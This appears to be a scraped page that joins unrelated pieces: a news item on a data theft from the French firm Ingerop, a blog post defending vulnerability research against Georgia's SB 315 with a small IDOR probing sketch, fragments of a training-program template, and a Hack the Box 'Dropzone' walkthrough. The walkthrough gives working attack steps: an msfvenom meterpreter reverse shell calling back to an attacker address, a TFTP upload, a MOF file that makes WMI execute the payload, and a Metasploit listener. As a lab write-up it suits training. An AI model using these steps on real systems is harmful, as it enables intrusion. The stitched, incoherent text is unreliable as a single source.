Make sure you're spending your hard-earned cash on the 'right' IT security
Comment One of the unpleasant developments of the last decade has been the speed with which IT security threats, once aimed mainly at large enterprises, have spread to SMBs – small and medium businesses…
A cyber attack on a French engineering firm has exposed thousands of confidential documents relating to nuclear power plants, and some of the stolen data was later found on a rented server in Germany.
According to the report, the hacker accessed data illegally from the French company Ingerop in June this year. The stolen data trove amounted to more than 65 gigabytes and includes data about nuclear power plants, blueprints for prisons, and tram networks.
“Thousands of sensitive documents pertaining to nuclear power plants, prisons, and tram networks have been stolen from the servers of a French company in a cyber attack, German and French media have reported Friday,” the German website DW.com reported.
“The data illegally accessed from the French company Ingerop back in June amounted to more than 65 gigabytes, according to reports by German public broadcaster NDR, the daily Süddeutsche Zeitung and French newspaper Le Monde.”
A company spokeswoman said that the hackers got hold of more than 11,000 files from a dozen projects.
The sensitive documents include the locations of CCTV cameras inside a French high-security prison, detailed information about the plant, and a proposed site for a nuclear waste dump in northeastern France.
According to news stories, state election websites are full of common vulnerabilities, such as those documented in the OWASP Top 10. One example is insecure "direct object references," which would allow any voter registration record to be read or changed, and could even allow a hacker to cancel the registrations of voters from the other party.
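To illustrate the idea, here is a minimal sketch of how an insecure direct object reference is probed. The endpoint, parameter name, and IDs below are invented for demonstration (not Georgia's actual site), and the "server" is a local stub with no authorization check:

```python
# Hypothetical sketch of probing an insecure direct object reference
# (IDOR): if a registration record is fetched by a guessable numeric ID
# with no authorization check, neighboring IDs expose other voters.
# The URL and parameter names below are invented for illustration.

def record_url(base, voter_id):
    """Build the URL for one registration record (hypothetical endpoint)."""
    return f"{base}/registration?voter_id={voter_id}"

def probe_idor(base, my_id, fetch, span=3):
    """Request IDs adjacent to our own; any record returned for an ID
    that is not ours indicates a direct object reference flaw."""
    leaks = []
    for vid in range(my_id - span, my_id + span + 1):
        if vid == my_id:
            continue
        record = fetch(record_url(base, vid))
        if record is not None:   # server returned someone else's data
            leaks.append(vid)
    return leaks

# Stubbed "server" with no authorization check, for demonstration only.
db = {1041: "Alice", 1042: "Bob", 1043: "Carol"}
def fake_fetch(url):
    vid = int(url.rsplit("=", 1)[1])
    return db.get(vid)           # hands back any record it holds

print(probe_idor("https://example.gov", 1042, fake_fetch))  # → [1041, 1043]
```

The point of the sketch is how little "hacking" this requires: the tester only changes a number in a URL, which is exactly why the legal status of such probing matters.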
Testing for such weaknesses is not a crime. Indeed, it's desirable that people can test for security weaknesses. Systems that aren't open to test are insecure. This concept is the basis for many policy initiatives at the federal level, to not only protect researchers probing for weaknesses from prosecution, but to even provide bounties encouraging them to do so. The DoD has a "Hack the Pentagon" initiative encouraging exactly this.
But the State of Georgia is stereotypically backwards and thuggish. Earlier this year, the legislature passed SB 315, which criminalized merely attempting to access a computer without permission in order to probe for possible vulnerabilities. To the ignorant and backwards person this seems reasonable: of course this bad activity should be outlawed. But as we in the cybersecurity community have learned over the last decades, such laws only stop your friends from finding security vulnerabilities, and do nothing to discourage your enemies. Russian election-meddling hackers are not deterred by such laws; the only people deterred are Georgia residents concerned about whether their government websites are secure.
It's your own users, and well-meaning security researchers, who are the primary source for improving security. Unless you live under a rock (like Brian Kemp, apparently), you'll have noticed that every month you have your Windows desktop or iPhone nagging you about updating the software to fix security issues. If you look behind the scenes, you'll find that most of these security fixes come from outsiders. They come from technical experts who accidentally come across vulnerabilities. They come from security researchers who specifically look for vulnerabilities.
It's because of this "research" that systems are mostly secure today. A few days ago was the 30th anniversary of the "Morris Worm" that took down the nascent Internet in 1988. The net of that time was hostile to security research, with major companies ignoring vulnerabilities. Systems then were laughably insecure, but vendors tried to address the problem by suppressing research. The Morris Worm exploited several vulnerabilities that were well-known at the time, but ignored by the vendor (in this case, primarily Sun Microsystems).
Since then, with a culture of outsiders disclosing vulnerabilities, vendors have been pressured into fixing them. This has led to vast improvements in security. I'm posting this from a public WiFi hotspot in a bar, for example, because computers are secure enough for this to be safe. Ten years ago, such activity wasn't safe.
The Georgia Democrats obviously have concerns about the integrity of election systems. They have every reason to thoroughly probe an elections website looking for vulnerabilities. This sort of activity should be encouraged, not suppressed as Brian Kemp is doing.
To be fair, the issue isn't so clear. The Democrats aren't necessarily the good guys. They are probably going to lose by a slim margin, and will cry foul, pointing to every election irregularity as evidence they were cheated. It's like how, in several races where Republicans lost by slim margins, they claimed criminals and dead people had voted, and used that to call for voter ID laws. In this case, Democrats are going to point to any potential vulnerability, real or imagined, as disenfranchising their voters. There has already been hyping of potential election system vulnerabilities out of proportion to their realistic threat for this reason.
But while not necessarily in completely good faith, such behavior isn't criminal. If an election website has vulnerabilities, then the state should encourage the details to be made public -- and fix them.
One of the principles we've learned since the Morris Worm is that of "full disclosure". It's not simply that we want such vulnerabilities found and fixed, we also want the complete details to be made public, even embarrassing details. Among the reasons for this is that it's the only way that everyone can appreciate the consequence of vulnerabilities.
In this case, without having the details, we have only the spin from both sides to go by. One side is spinning the fact that the website was wide open. The other side, as in the above announcement, claims the website was completely secure. Obviously, one side is lying, and the only way for us to know is if the full details of the potential vulnerability are fully disclosed.
By the way, it's common for researchers to overstate the severity of a vulnerability. This is at least as common as the embarrassed side trying to cover it up. It's impossible to say which side is at fault here, whether the vulnerability is real or not, without full disclosure. Again, the wrong, backwards thinking is to believe that details of vulnerabilities should be controlled, to avoid exploitation by bad guys. In fact, they should be disclosed, even if it helps the bad guys.
But regardless if these vulnerabilities are real, we do know that criminal investigation and prosecution is the wrong way to deal with the situation. If the election site is secure, then the appropriate response is to document why.
With that said, there's a good chance the Democrats are right and Brian Kemp's office is wrong. In the very announcement declaring their websites secure, Google Chrome flags the site in question, sos.ga.gov, as "Not secure" in the URL bar, because it doesn't use encryption.
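Chrome's "Not secure" label here reflects the most basic property there is: the page is served over plain HTTP rather than TLS. A minimal sketch of that first-pass check (a real audit would also verify the certificate and whether HTTP redirects to HTTPS):

```python
# Minimal sketch: a site fetched over plain "http" (no TLS) is what
# makes Chrome display "Not secure". The simplest check is the URL
# scheme itself; certificate validation and redirect behavior are
# deliberately out of scope for this illustration.
from urllib.parse import urlparse

def uses_encryption(url):
    """True only if the URL would be fetched over TLS."""
    return urlparse(url).scheme == "https"

print(uses_encryption("http://sos.ga.gov"))    # → False
print(uses_encryption("https://example.com"))  # → True
```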
I'm Libertarian, so I'm going to hate a Democrat governor more than a Republican governor. However, I'm also a cybersecurity expert and somebody famous for scanning for vulnerabilities. As a Georgia resident, I'm personally threatened by this backwards thuggish behavior by Brian Kemp. He learned nothing from this year's fight over SB 315, and unlike the clueful outgoing governor who vetoed that bill, Kemp is likely to sign something similar, or worse, into law.
The integrity of election systems is an especially important concern. The only way to guarantee them is to encourage research, the probing by outsiders for vulnerabilities, and fully disclosing the results. Even if Georgia had the most secure systems, embarrassing problems are going to be found. Companies like Intel, Microsoft, and Apple are the leaders in cybersecurity, and even they have had embarrassing vulnerabilities in the last few months. They have responded by paying bounties to the security researchers who found those problems, not by criminally investigating them.
Outline the most effective bits, the approaches, activities etc. that are working well and delivering real business value.
This is the low-value, outdated stuff that no longer earns its keep, is unpopular and frankly not worth the effort any more.
The things that need revision.
Clarify the need or justification for change, elaborate on the anticipated improvements and (for the plan) at least outline how the changes are to be made.
Innovation helps keep the awareness and training program topical, engaging and relevant. As well as updating the content, refreshing the delivery mechanisms can breathe new life into it.
Today we are going to solve another CTF challenge, “Dropzone”. It is a retired vulnerable lab presented by Hack the Box to help pentesters perform online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Task: To find the user.txt and root.txt files
Note: Since these labs are available online, they have static IP addresses. The IP of Dropzone is 10.10.10.90.
Let’s start off with our basic nmap command to find out the open ports and services.
nmap -sU -T4 10.10.10.90
From the image given below, you can observe that port 69 is open on the target system, running the TFTP service.
We connect to the target system using a TFTP client and find that we can upload and download files. We retrieve the “boot.ini” file to identify the operating system running on the target machine.
We take a look at the boot.ini file and find that the target system is running “Windows XP”.
We are unable to find any exploit for the TFTP service itself, so we are going to use MOF file WMI exploitation to get a reverse shell on the target machine. On Windows XP, the WMI service automatically compiles and executes any managed object format (MOF) file dropped into the system32\wbem\mof directory, which is what makes this technique work.
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.4 lport=443 -f exe > hack.exe
We upload both the shell and the MOF file using tftp.
tftp> binary
tftp> put hack.exe /WINDOWS/system32/hack.exe
tftp> put hack.mof /WINDOWS/system32/wbem/mof/hack.mof
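The contents of hack.mof are not shown in the writeup. Assuming it follows the classic WMI event-consumer template used for this technique, it would look roughly like the sketch below: an event filter that fires on a timer, a script consumer that launches our payload, and a binding between them (the instance names are arbitrary):

```mof
#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP1";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 1";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consP1";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\");"
                 "WSH.run(\"C:\\\\WINDOWS\\\\system32\\\\hack.exe\");";
};

instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
```

Once WMI compiles this file, the filter matches every time the system clock's seconds hit 1, and the consumer runs hack.exe, which calls back to our listener.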
We set up our listener before uploading the files.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.4
msf exploit(multi/handler) > set lport 443
msf exploit(multi/handler) > run
As soon as we upload the MOF file and our payload, we get a reverse shell. After getting the reverse shell, we check the system information and find that we have spawned a shell as administrator.
meterpreter > sysinfo
meterpreter > getuid
We go to “c:\Documents and Settings\Administrator\Desktop” and find a file called “root.txt”. We take a look at the content of the file and find that the flag is not present there.
meterpreter > cd Administrator
meterpreter > ls
meterpreter > cd Desktop
meterpreter > ls
meterpreter > cat root.txt
We go to the “flags” directory and find a file called “2 for the price of 1!.txt”, which hints that we have to use alternate data streams to find the flags. Alternate data streams (ADS) are a feature of the NTFS file system that lets a file carry additional named streams of data; they can be used to hide data from users.
meterpreter > cd flags
meterpreter > dir
meterpreter > cat "2 for the price of 1!.txt"
We can use streams.exe from Sysinternals to examine alternate data streams (the tool can be downloaded from the Sysinternals website).
We upload streams.exe to the target machine, spawn a shell, and execute the tool to enumerate the data streams in the current directory, which reveals both the user and root flags.
meterpreter > upload /root/Downloads/Streams/streams.exe
meterpreter > shell
streams -accepteula -s .
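For each file, streams.exe prints the file path followed by indented `:name:$DATA` lines for its alternate streams. As a quick illustration of reading that output, here is a sketch that extracts stream names; the sample output format is assumed from typical Sysinternals formatting, and the stream names are illustrative, not the real flags:

```python
# Sketch: parsing streams.exe-style output to list alternate data
# streams per file. The sample text below imitates the tool's typical
# output; it is an assumed format, not captured from the lab.
import re

def parse_streams(output):
    """Return {file_path: [stream names]} from streams.exe-like output."""
    result, current = {}, None
    for line in output.splitlines():
        if line.endswith(":") and not line.startswith(" "):
            current = line[:-1]                # a file path header
            result[current] = []
        else:
            m = re.search(r":(\w+):\$DATA", line)
            if m and current is not None:
                result[current].append(m.group(1))
    return result

sample = """C:\\flags\\2 for the price of 1!.txt:
   :user_txt:$DATA 33
   :root_txt:$DATA 33"""
print(parse_streams(sample))
```

Once a stream name is known, its contents can be read on Windows with something like `more < "2 for the price of 1!.txt:user_txt"`.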
Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast.